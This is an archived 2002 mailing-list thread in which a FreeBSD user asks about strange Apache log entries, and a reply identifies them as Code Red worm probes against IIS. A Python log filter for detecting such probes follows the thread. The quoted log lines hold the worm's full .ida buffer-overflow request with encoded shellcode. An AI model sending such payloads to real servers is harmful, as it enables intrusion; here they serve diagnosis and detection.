Could someone help explain this Please?

Ian MacDonald ian at ianm.net
Thu Oct 17 20:00:34 BST 2002


Hmm, looks like the Code Red worm that did the rounds almost 2 years ago
now. It was designed to attack IIS. You will be OK with Apache against
this.

Good idea though to keep your eye on the httpd security report at
http://httpd.apache.org/security_report.html and any other security
reports/notices for all the apps you use.

Ian.

-----Original Message-----
From: redjupiter [mailto:redjupiter at ntlworld.com]
Sent: 17 October 2002 19:53
To: freebsd-users at uk.freebsd.org
Subject: Could someone help explain this Please?


Hi guys,

While checking my httpd-access.log I came across this entry:


200.13.240.94 - - [17/Oct/2002:09:41:52 +0100] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9
090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0
078%u0000%u00=a  HTTP/1.0" 400 309 "-" "-"

24.157.163.166 - - [17/Oct/2002:09:50:39 +0100] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9
090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0
078%u0000%u00=a  HTTP/1.0" 400 309 "-" "-"

213.70.156.209 - - [12/Oct/2002:16:36:22 +0100] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9
090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0
078%u0000%u00=a  HTTP/1.0" 400 309 "-" "-"

Are these guys trying to buffer overflow the Apache httpd server?

Am I safe with Apache version 2.0.42?

Thanks for any input.
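
Added example, not part of the original thread: a small Python filter that flags access-log entries shaped like the ones quoted above (a `.ida` request with a long run of one padding character followed by `%uXXXX` escapes) and reports whether the server answered any of them with a 2xx status. The thresholds, function names and sample lines are assumptions constructed for illustration, and the match is generalised to any repeated padding character, not only `N`.

```python
import re
from collections import Counter

# Apache common/combined log format: host ident user [time] "request" status ...
LOG_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<request>[^"]*)" (?P<status>\d{3}) ')
PAD_RE = re.compile(r'(.)\1{99,}')          # 100+ repeats of one padding character
UESC_RE = re.compile(r'%u[0-9a-fA-F]{4}')   # IIS-style %uXXXX escapes


def classify(line):
    """Return a dict for a probe-shaped request, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = m.group("request").split()      # tolerates the double space before HTTP/1.0
    if len(parts) < 2:
        return None
    path, _, query = parts[1].partition("?")
    if not path.lower().endswith(".ida"):
        return None
    if not PAD_RE.search(query) or len(UESC_RE.findall(query)) < 4:
        return None
    status = int(m.group("status"))
    return {"host": m.group("host"), "status": status, "served": 200 <= status < 300}


def summarize(lines):
    """Count probes per source host and collect any the server answered with 2xx."""
    hits = [h for h in map(classify, lines) if h]
    return Counter(h["host"] for h in hits), [h for h in hits if h["served"]]


# Constructed sample lines: documentation addresses and a shortened payload.
_probe = "/default.ida?" + "N" * 224 + "%u9090%u6858%ucbd3%u7801" * 3 + "%u00=a"
SAMPLE = [
    f'192.0.2.10 - - [17/Oct/2002:09:41:52 +0100] "GET {_probe}  HTTP/1.0" 400 309 "-" "-"',
    f'192.0.2.10 - - [17/Oct/2002:09:50:39 +0100] "GET {_probe}  HTTP/1.0" 400 309 "-" "-"',
    f'198.51.100.7 - - [12/Oct/2002:16:36:22 +0100] "GET {_probe}  HTTP/1.0" 400 309 "-" "-"',
    '203.0.113.5 - - [17/Oct/2002:10:02:11 +0100] "GET /index.html HTTP/1.0" 200 1043 "-" "-"',
    '203.0.113.5 - - [17/Oct/2002:10:02:15 +0100] "GET /search.ida?q=test HTTP/1.0" 404 210 "-" "-"',
]

if __name__ == "__main__":
    per_host, served = summarize(SAMPLE)
    for host, n in per_host.most_common():
        print(f"{host}: {n} probe(s)")
    print("answered with 2xx:", len(served))
```

A non-empty second return value from `summarize` is the case worth following up, since it means a probe-shaped request was served rather than rejected.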
